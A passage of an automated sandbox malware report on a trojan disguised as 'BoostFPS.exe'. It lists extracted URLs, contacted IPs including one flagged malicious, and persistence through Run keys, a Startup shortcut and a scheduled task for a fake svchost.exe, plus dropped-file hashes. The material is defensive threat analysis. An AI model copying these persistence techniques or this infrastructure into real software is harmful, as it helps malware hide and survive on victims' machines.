                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.2179167608.000001DBE041A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000011.00000002.2706955560.0000027077B70000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2196208594.000001DBF0263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2291803371.000002243E563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2447582953.0000021BCFCB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.micpowershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000011.00000002.2670955565.000002706F582000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://wwwft.com/pkiops/crProPCA2011_2011-l0apowershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://go.microsoft.co_powershell.exe, 00000008.00000002.2201726247.000001DBF867A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://Token.dllpowershell.exe, 00000011.00000002.2700888169.0000027077893000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.microsoft.powershell.exe, 00000011.00000002.2706284204.0000027077A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.micft.cMicRosofpowershell.exe, 0000000E.00000002.2473414490.0000021BD8467000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore68powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://wwoft.com/pkiops/cpowershell.exe, 0000000E.00000002.2468534296.0000021BD8078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2179167608.000001DBE01F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2235051244.000002242E4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2349983022.0000021BBFC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2515230432.000002705F511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2515230432.000002705F739000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      208.95.112.1
                                                      		ip-api.comUnited States
                                                      		53334TUT-ASUSfalse
                                                      45.141.27.248
                                                      		unknownNetherlands
                                                      		62068SPECTRAIPSpectraIPBVNLtrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1559236
                                                      Start date and time:2024-11-20 10:36:06 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 51s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:25
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:BoostFPS.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@32/23@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 12.5%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 108
                                                      • Number of non-executed functions: 4
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                      • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target BoostFPS.exe, PID 5252 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 3364 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4164 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 2704 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 4748 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 6292 because it is empty
                                                      • Execution Graph export aborted for target svchost.exe, PID 6968 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • VT rate limit hit for: BoostFPS.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      04:37:09API Interceptor57x Sleep call for process: powershell.exe modified
                                                      04:38:06API Interceptor108x Sleep call for process: svchost.exe modified
                                                      04:38:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                      04:38:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
                                                      04:38:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                                      10:38:06Task SchedulerRun new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      208.95.112.1New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • ip-api.com/line/
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • ip-api.com/line/
                                                      FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      file.exeGet hashmaliciousClipboard HijackerBrowse
                                                      • ip-api.com/line/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ip-api.comNew_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 208.95.112.1
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 208.95.112.1
                                                      paket teklif.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      SPECTRAIPSpectraIPBVNLbPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                      • 45.138.16.44
                                                      4Fm0sK0yKz.exeGet hashmaliciousAsyncRATBrowse
                                                      • 45.141.215.18
                                                      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                      • 45.141.215.40
                                                      Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                      • 45.141.215.116
                                                      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                      • 45.138.16.76
                                                      Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                      • 45.141.215.21
                                                      Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                      • 45.141.215.61
                                                      https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
                                                      • 45.87.42.74
                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                      • 45.141.201.6
                                                      na.elfGet hashmaliciousUnknownBrowse
                                                      • 45.142.6.235
                                                      TUT-ASUSNew_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 208.95.112.1
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 208.95.112.1
                                                      http://ok.clicknowvip.comGet hashmaliciousUnknownBrowse
                                                      • 162.252.214.5
                                                      paket teklif.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BoostFPS.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\BoostFPS.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):654
                                                      Entropy (8bit):5.380476433908377
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):654
                                                      Entropy (8bit):5.380476433908377
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):41
                                                      Entropy (8bit):3.7195394315431693
                                                      Encrypted:false
                                                      SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                      MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                      SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                      SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                      SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                      Malicious:false
                                                      Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ggvwb5x.uqe.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zkytvg1.nif.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eme0efz3.pd2.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enlihd5y.irv.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gml4olhe.zxi.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huopx33y.r1e.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iif5qvo5.czu.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ke5jdrkb.hft.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mom512g0.reg.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mu0ndttj.kcj.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qicgx3xx.vhs.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfqerpcf.nnq.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wn1jbp2n.b3z.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
